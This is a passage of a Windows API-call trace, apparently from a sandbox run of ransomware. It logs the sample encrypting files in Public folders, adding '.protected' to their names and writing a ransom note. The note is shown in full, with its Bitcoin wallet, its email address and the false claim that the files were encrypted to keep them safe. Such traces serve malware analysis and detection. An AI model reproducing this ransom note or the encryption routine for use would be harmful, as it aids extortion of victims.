lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.063] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.063] CloseHandle (hObject=0xd4) returned 1 [0096.063] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.protected") returned 84 [0096.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.protected" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.protected")) returned 1 [0096.064] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0096.064] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0096.064] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\RESTORE_FILES.txt") returned 62 [0096.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\sample media\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.081] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.081] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0096.082] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.082] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0096.082] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.082] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0096.082] CloseHandle (hObject=0xb4) returned 1 [0096.083] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0096.083] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0096.083] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\RESTORE_FILES.txt") returned 49 [0096.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0096.085] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.085] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0096.086] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.086] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0096.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.086] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0096.086] CloseHandle (hObject=0xa4) returned 1 [0096.086] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="Windows") returned -1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="Program Files") returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="Program Files (x86)") returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="$Recycle.bin") returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="System Volume Information") returned 1 [0096.086] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos") returned 26 [0096.086] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0096.086] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0096.086] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\*") returned 28 [0096.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0096.086] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.086] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.086] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0096.086] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.086] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.086] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\.") returned 28 [0096.086] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.087] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.087] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\." (normalized: "c:\\users\\public\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.087] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.087] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.087] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.087] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\..") returned 29 [0096.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.087] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0096.087] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.087] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.087] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.087] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.087] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.088] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.088] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.088] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.088] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.088] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.088] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.089] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0096.089] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.089] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0096.089] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.089] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0096.089] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0096.089] CloseHandle (hObject=0xb4) returned 1 [0096.090] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.protected") returned 48 [0096.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.protected" (normalized: "c:\\users\\public\\videos\\desktop.ini.protected")) returned 1 [0096.091] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="Windows") returned -1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="Program Files") returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="Program Files (x86)") returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="$Recycle.bin") returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="System Volume Information") returned -1 [0096.091] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned 40 [0096.091] lstrcmpW (lpString1="Sample Videos", lpString2=".") returned 1 [0096.091] lstrcmpW (lpString1="Sample Videos", lpString2="..") returned 1 [0096.091] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*") returned 42 [0096.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0096.091] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.091] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.091] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0096.091] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.091] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.091] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\.") returned 42 [0096.091] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.091] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.091] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\." (normalized: "c:\\users\\public\\videos\\sample videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.092] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.092] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.092] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.092] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.092] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.092] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.092] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\..") returned 43 [0096.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.092] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0096.092] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\.." (normalized: "c:\\users\\public\\videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.092] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.092] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.092] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.092] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0096.093] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.093] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.093] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.093] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.093] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.093] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.093] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x146, lpOverlapped=0x0) returned 1 [0096.094] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.094] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x146, lpOverlapped=0x0) returned 1 [0096.094] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.094] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.094] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.094] CloseHandle (hObject=0xd4) returned 1 [0096.095] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.protected") returned 62 [0096.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.protected" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.protected")) returned 1 [0096.095] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.095] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="Windows") returned -1 [0096.095] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="Program Files") returned 1 [0096.096] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="Program Files (x86)") returned 1 [0096.096] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="$Recycle.bin") returned 1 [0096.096] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="System Volume Information") returned 1 [0096.096] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrIW (lpFirst="Wildlife.wmv", lpSrch=".protected") returned 0x0 [0096.096] lstrcmpW (lpString1="Wildlife.wmv", lpString2="RESTORE_FILES.txt") returned 1 [0096.096] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.096] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 